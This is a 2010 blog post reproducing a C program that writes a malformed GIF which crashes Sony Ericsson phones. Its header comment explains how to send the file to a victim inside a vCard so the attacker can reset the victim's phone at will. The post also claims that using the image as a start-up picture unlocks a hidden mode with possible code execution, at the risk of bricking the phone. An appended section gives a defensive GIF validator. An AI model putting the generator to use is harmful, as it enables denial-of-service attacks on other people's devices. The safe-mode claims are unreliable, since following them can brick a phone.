Tuesday, 29 June 2010

Sony Ericsson: From Crash To Brick

Fellow nerds may recall the GIF file crash by Le Quack posted on inj3ct0r.com; if you didn't see it, here is some C code to generate the file:

// ,-------------------------------------------,
// | [+] Title: Sony Ericsson GIF Crash bug |
// | [+] Date: 2010-06-07 |
// | [+] Author: Le Quack |
// | [+] Version: All Sony Ericssons from Txxx |
// | [+] Tested on: T630, K750i, W610i |
// | [+] Category: Local |
// `-------------------------------------------'

// ,--------------------------------------------------------------------------------------------------,
// | Any attempt to show generated image will crash the phone (white screen and restart). |
// | It is also possible to create a vCard containing this image (Google), that will be automatically |
// | saved in the images' main directory just after accepting our vCard by victim. Of course you can |
// | include your phone number and reset victim's phone whenever you want (just call him). The only |
// | way to get rid of this file is deleting it by cable/bluetooth (or just format a memory). |
// `--------------------------------------------------------------------------------------------------'

#include <cstdio>  // printf, FILE, fopen, fwrite, fclose

using namespace std;

int main(int argc, char **argv)
{
    unsigned char data[] =
    {
0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x01, 0x00, 0x01, 0x00, 0xF7, 0x00, 0x00, 0x00, 0x00, 0x00,
0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00,
0x80, 0x80, 0x80, 0x80, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x66, 0x00, 0x00,
0x99, 0x00, 0x00, 0xCC, 0x00, 0x00, 0xFF, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x33, 0x66,
0x00, 0x33, 0x99, 0x00, 0x33, 0xCC, 0x00, 0x33, 0xFF, 0x00, 0x66, 0x00, 0x00, 0x66, 0x33, 0x00,
0x66, 0x66, 0x00, 0x66, 0x99, 0x00, 0x66, 0xCC, 0x00, 0x66, 0xFF, 0x00, 0x99, 0x00, 0x00, 0x99,
0x33, 0x00, 0x99, 0x66, 0x00, 0x99, 0x99, 0x00, 0x99, 0xCC, 0x00, 0x99, 0xFF, 0x00, 0xCC, 0x00,
0x00, 0xCC, 0x33, 0x00, 0xCC, 0x66, 0x00, 0xCC, 0x99, 0x00, 0xCC, 0xCC, 0x00, 0xCC, 0xFF, 0x00,
0xFF, 0x00, 0x00, 0xFF, 0x33, 0x00, 0xFF, 0x66, 0x00, 0xFF, 0x99, 0x00, 0xFF, 0xCC, 0x00, 0xFF,
0xFF, 0x33, 0x00, 0x00, 0x33, 0x00, 0x33, 0x33, 0x00, 0x66, 0x33, 0x00, 0x99, 0x33, 0x00, 0xCC,
0x33, 0x00, 0xFF, 0x33, 0x33, 0x00, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x33, 0x33, 0x99, 0x33,
0x33, 0xCC, 0x33, 0x33, 0xFF, 0x33, 0x66, 0x00, 0x33, 0x66, 0x33, 0x33, 0x66, 0x66, 0x33, 0x66,
0x99, 0x33, 0x66, 0xCC, 0x33, 0x66, 0xFF, 0x33, 0x99, 0x00, 0x33, 0x99, 0x33, 0x33, 0x99, 0x66,
0x33, 0x99, 0x99, 0x33, 0x99, 0xCC, 0x33, 0x99, 0xFF, 0x33, 0xCC, 0x00, 0x33, 0xCC, 0x33, 0x33,
0xCC, 0x66, 0x33, 0xCC, 0x99, 0x33, 0xCC, 0xCC, 0x33, 0xCC, 0xFF, 0x33, 0xFF, 0x00, 0x33, 0xFF,
0x33, 0x33, 0xFF, 0x66, 0x33, 0xFF, 0x99, 0x33, 0xFF, 0xCC, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0x00,
0x66, 0x00, 0x33, 0x66, 0x00, 0x66, 0x66, 0x00, 0x99, 0x66, 0x00, 0xCC, 0x66, 0x00, 0xFF, 0x66,
0x33, 0x00, 0x66, 0x33, 0x33, 0x66, 0x33, 0x66, 0x66, 0x33, 0x99, 0x66, 0x33, 0xCC, 0x66, 0x33,
0xFF, 0x66, 0x66, 0x00, 0x66, 0x66, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x99, 0x66, 0x66, 0xCC,
0x66, 0x66, 0xFF, 0x66, 0x99, 0x00, 0x66, 0x99, 0x33, 0x66, 0x99, 0x66, 0x66, 0x99, 0x99, 0x66,
0x99, 0xCC, 0x66, 0x99, 0xFF, 0x66, 0xCC, 0x00, 0x66, 0xCC, 0x33, 0x66, 0xCC, 0x66, 0x66, 0xCC,
0x99, 0x66, 0xCC, 0xCC, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0x00, 0x66, 0xFF, 0x33, 0x66, 0xFF, 0x66,
0x66, 0xFF, 0x99, 0x66, 0xFF, 0xCC, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0x00, 0x99, 0x00, 0x33, 0x99,
0x00, 0x66, 0x99, 0x00, 0x99, 0x99, 0x00, 0xCC, 0x99, 0x00, 0xFF, 0x99, 0x33, 0x00, 0x99, 0x33,
0x33, 0x99, 0x33, 0x66, 0x99, 0x33, 0x99, 0x99, 0x33, 0xCC, 0x99, 0x33, 0xFF, 0x99, 0x66, 0x00,
0x99, 0x66, 0x33, 0x99, 0x66, 0x66, 0x99, 0x66, 0x99, 0x99, 0x66, 0xCC, 0x99, 0x66, 0xFF, 0x99,
0x99, 0x00, 0x99, 0x99, 0x33, 0x99, 0x99, 0x66, 0x99, 0x99, 0x99, 0x99, 0x99, 0xCC, 0x99, 0x99,
0xFF, 0x99, 0xCC, 0x00, 0x99, 0xCC, 0x33, 0x99, 0xCC, 0x66, 0x99, 0xCC, 0x99, 0x99, 0xCC, 0xCC,
0x99, 0xCC, 0xFF, 0x99, 0xFF, 0x00, 0x99, 0xFF, 0x33, 0x99, 0xFF, 0x66, 0x99, 0xFF, 0x99, 0x99,
0xFF, 0xCC, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0x00, 0xCC, 0x00, 0x33, 0xCC, 0x00, 0x66, 0xCC, 0x00,
0x99, 0xCC, 0x00, 0xCC, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0x00, 0xCC, 0x33, 0x33, 0xCC, 0x33, 0x66,
0xCC, 0x33, 0x99, 0xCC, 0x33, 0xCC, 0xCC, 0x33, 0xFF, 0xCC, 0x66, 0x00, 0xCC, 0x66, 0x33, 0xCC,
0x66, 0x66, 0xCC, 0x66, 0x99, 0xCC, 0x66, 0xCC, 0xCC, 0x66, 0xFF, 0xCC, 0x99, 0x00, 0xCC, 0x99,
0x33, 0xCC, 0x99, 0x66, 0xCC, 0x99, 0x99, 0xCC, 0x99, 0xCC, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0x00,
0xCC, 0xCC, 0x33, 0xCC, 0xCC, 0x66, 0xCC, 0xCC, 0x99, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFF, 0xCC,
0xFF, 0x00, 0xCC, 0xFF, 0x33, 0xCC, 0xFF, 0x66, 0xCC, 0xFF, 0x99, 0xCC, 0xFF, 0xCC, 0xCC, 0xFF,
0xFF, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x33, 0xFF, 0x00, 0x66, 0xFF, 0x00, 0x99, 0xFF, 0x00, 0xCC,
0xFF, 0x00, 0xFF, 0xFF, 0x33, 0x00, 0xFF, 0x33, 0x33, 0xFF, 0x33, 0x66, 0xFF, 0x33, 0x99, 0xFF,
0x33, 0xCC, 0xFF, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0xFF, 0x66, 0x33, 0xFF, 0x66, 0x66, 0xFF, 0x66,
0x99, 0xFF, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0xFF, 0x99, 0x33, 0xFF, 0x99, 0x66,
0xFF, 0x99, 0x99, 0xFF, 0x99, 0xCC, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0xFF,
0xCC, 0x66, 0xFF, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
0x33, 0xFF, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x21, 0xF9, 0x04,
0x01, 0x00, 0x00, 0x10, 0x00, 0x2C, 0xF0, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x04, 0x00, 0xFF, 0x05, 0x04, 0x00, 0x3B,
} ;

    printf("\n[+] Sony Ericsson GIF Crash bug\n");
    printf("[+] Coded and discovered by Le Quack \n");
    printf("[+] Generated file should work with models from Txxx, tested on T630, K750i, W610i\n\n");

    // Exactly one argument is expected: the name of the file to write.
    if(argc != 2)
    {
        printf("[+] Usage: %s <filename>\n", argv[0]);
        return 0;
    }

    FILE* pFile;
    pFile = fopen(argv[1], "wb");
    if(pFile == NULL)
    {
        printf("[-] Error creating file. Exiting.\n");
        return 0;
    }

    // Write the byte array out unchanged.
    fwrite(data, 1, sizeof(data), pFile);

    printf("[+] File has been saved as \"%s\"\n", argv[1]);
    // sizeof yields a size_t, so print it with %zu rather than %d.
    printf("[+] Written %zu bytes\n", sizeof(data));

    fclose(pFile);

    return 0;
}
Anyway, to activate the hidden safe mode on Sony Ericsson phones using this image, and unlock an option where arbitrary code can be executed (with added work), just set it as the start-up picture.

The phone goes into panic mode, wherein any function which affects or uses external hardware (e.g. camera or light) is disabled. Clicking one of these will leave the phone bricked if you turn it off without setting a different start-up picture.

The benefit of this hidden mode is that it does things in a dodgier way, and pretty much drops any attempt to verify hardware.
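A defensive counterpart to the generator above, as an added example that is not from the original post or from Le Quack: a strict structural check an image handler could run before decoding. The post does not say which bytes trigger the crash; this check flags what is structurally unusual in the `data` array, whose image descriptor places a 0x0 frame at offset 240,240 on a 1x1 logical screen. The names `gif_check`, `ok_gif` and `bad_gif` are assumptions, and both samples are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { GIF_OK, GIF_TRUNCATED, GIF_BAD_MAGIC, GIF_BAD_BLOCK,
       GIF_FRAME_EMPTY, GIF_FRAME_OUT_OF_BOUNDS };
static uint32_t le16(const uint8_t *p) { return p[0] | ((uint32_t)p[1] << 8); }
/* Reject any frame that is empty or not fully inside the logical screen. */
int gif_check(const uint8_t *b, size_t n)
{
    if (n < 13) return GIF_TRUNCATED;
    if (memcmp(b, "GIF87a", 6) && memcmp(b, "GIF89a", 6)) return GIF_BAD_MAGIC;
    uint32_t sw = le16(b + 6), sh = le16(b + 8);
    size_t i = 13;
    if (b[10] & 0x80) i += (size_t)3 << ((b[10] & 7) + 1);   /* global colour table */
    while (i < n) {
        uint8_t tag = b[i++];
        if (tag == 0x3B) return GIF_OK;                       /* trailer */
        if (tag == 0x21) i++;                                 /* extension: skip label */
        else if (tag == 0x2C) {                               /* image descriptor */
            if (n - i < 9) return GIF_TRUNCATED;
            uint32_t x = le16(b + i), y = le16(b + i + 2);
            uint32_t w = le16(b + i + 4), h = le16(b + i + 6);
            if (w == 0 || h == 0) return GIF_FRAME_EMPTY;
            if (x + w > sw || y + h > sh) return GIF_FRAME_OUT_OF_BOUNDS;
            uint8_t packed = b[i + 8];
            i += 10;                                          /* descriptor + LZW code size */
            if (packed & 0x80) i += (size_t)3 << ((packed & 7) + 1); /* local table */
        } else return GIF_BAD_BLOCK;
        for (;;) {                                            /* skip data sub-blocks */
            if (i >= n) return GIF_TRUNCATED;
            size_t len = b[i++];
            if (len == 0) break;
            if (n - i < len) return GIF_TRUNCATED;
            i += len;
        }
    }
    return GIF_TRUNCATED;                                     /* no trailer seen */
}

/* Constructed samples: 1x1 screen, no colour tables, one frame each. */
static const uint8_t ok_gif[]  = { 'G','I','F','8','9','a', 1,0, 1,0, 0,0,0,
    0x2C, 0,0, 0,0, 1,0, 1,0, 0,  2, 2,0x44,0x01, 0, 0x3B };
static const uint8_t bad_gif[] = { 'G','I','F','8','9','a', 1,0, 1,0, 0,0,0,
    0x2C, 0xF0,0, 0xF0,0, 0,0, 0,0, 0,  2, 2,0x44,0x01, 0, 0x3B };
int main(void) {
    printf("%d %d\n", gif_check(ok_gif, sizeof ok_gif), gif_check(bad_gif, sizeof bad_gif));
    return 0;
}
```

This policy is stricter than many desktop decoders, which tolerate frames that extend past the logical screen.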
